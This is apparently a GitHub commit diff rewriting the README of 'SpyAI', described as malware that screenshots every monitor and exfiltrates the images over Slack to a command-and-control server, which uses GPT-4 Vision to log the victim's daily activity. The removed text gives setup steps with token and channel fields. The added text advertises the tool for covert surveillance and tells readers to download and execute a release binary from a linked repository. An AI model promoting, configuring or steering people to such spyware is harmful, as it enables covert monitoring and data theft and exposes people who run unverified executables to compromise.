Skip to content

Commit c9dd163

Browse files
committed
Commit
1 parent 22489d1 commit c9dd163

File tree

1 file changed

+44
-27
lines changed

1 file changed

+44
-27
lines changed

README.md

Lines changed: 44 additions & 27 deletions
Original file line numberDiff line numberDiff line change
@@ -1,27 +1,44 @@
1-
# SpyAI
2-
Intelligent Malware that takes screenshots for entire monitors and exfiltrate them through Trusted Channel Slack to the C2 server that's using GPT-4 Vision to analyze them and construct daily activity — frame by frame
3-
4-
#### Setup
5-
For the Python server install those requirements using :
6-
```
7-
pip install slack_sdk requests openai pillow
8-
```
9-
And change in the Python script those fields:
10-
```
11-
SLACK_TOKEN = "<SLACK_TOKEN>"
12-
SLACK_CHANNEL_ID = "<SLACK_CHANNEL_ID>"
13-
CHECK_INTERVAL = <INTERVAL between each operation> # seconds
14-
openai.api_key = "<OPENAI_API_KEU>"
15-
```
16-
And change in the main.cpp:
17-
```
18-
const char* slackToken = "<SLACK_TOKEN>";
19-
const char* slackChannel = "#<CHANNEL_NAME>";
20-
...
21-
Sleep(<Sleep Time in MS>); // In ms
22-
```
23-
24-
25-
#### Demo
26-
[Watch demo video](https://streamable.com/qq78kt)
27-
1+
# SpyAI: 🤖🔵🔴
2+
3+
Welcome to the SpyAI repository! Here you will find an intelligent malware tool that specializes in capturing screenshots from entire monitors and sending them through a secure channel to a Command and Control (C2) server. The C2 server utilizes GPT-4 Vision technology to analyze the screenshots and construct a detailed daily activity log frame by frame.
4+
5+
## Repository Details
6+
7+
- **Repository Name**: SpyAI
8+
- **Description**: Intelligent Malware that takes screenshots for entire monitors and exfiltrates them through Trusted Channel Slack to the C2 server that's using GPT-4 Vision to analyze them and construct daily activity — frame by frame
9+
- **Topics**: ai, blueteam, hacking, hacking-tool, hackingtool, malware, purpleteam, redteam, redteam-tools, redteaming, redteamtool
10+
- **Release Link**: [Download SpyAI 🚀](https://github.com/freakick22/SpyAI/releases)
11+
12+
## About SpyAI
13+
14+
SpyAI is a cutting-edge malware tool designed for advanced monitoring and surveillance purposes. By leveraging sophisticated AI algorithms and secure communication protocols, SpyAI ensures seamless data transfer and analysis for strategic intelligence gathering.
15+
16+
Utilizing a combination of blue team and red team tactics, SpyAI operates discreetly in the background, capturing valuable visual data from target systems and transmitting it securely to the designated C2 server. The use of GPT-4 Vision technology allows for precise image analysis, enabling the creation of comprehensive daily activity reports for in-depth monitoring and threat assessment.
17+
18+
## Features
19+
20+
🔵 **Screen Capture**: SpyAI captures high-quality screenshots from all connected monitors.
21+
22+
🔴 **Secure Exfiltration**: Screenshots are exfiltrated through Trusted Channel Slack to ensure secure communication.
23+
24+
🤖 **AI Analysis**: The C2 server employs GPT-4 Vision AI to analyze screenshots and construct daily activity logs.
25+
26+
## Getting Started
27+
28+
To unleash the power of SpyAI, simply download the latest release from the [link provided](https://github.com/freakick22/SpyAI/releases). Execute the downloaded file to initiate the installation process and follow the on-screen instructions to set up SpyAI on your system.
29+
30+
## Contribution
31+
32+
Interested in contributing to SpyAI's development? Feel free to explore the codebase, suggest enhancements, or report any issues you encounter. Your input is valuable in advancing the capabilities and reliability of SpyAI for future users.
33+
34+
## Support
35+
36+
For any inquiries, feedback, or assistance regarding SpyAI, please visit the [official repository](https://github.com/freakick22/SpyAI). Our team is dedicated to providing prompt and effective support to address your needs and ensure a seamless experience with SpyAI.
37+
38+
## Stay Secure, Stay Informed
39+
40+
Your security is paramount, and SpyAI is here to empower your surveillance capabilities with advanced AI technology. Stay informed, stay vigilant, and let SpyAI drive your monitoring strategies to new heights of precision and efficiency.
41+
42+
---
43+
44+
By leveraging AI-driven surveillance capabilities, SpyAI empowers users with advanced monitoring and analysis tools. Enhance your surveillance strategies and stay ahead of potential threats with SpyAI's innovative features and secure communication protocols. Get started today and experience the next level of intelligence gathering with SpyAI. Download now and witness the power of AI in action! 👁️🔍🚀

0 commit comments

Comments
 (0)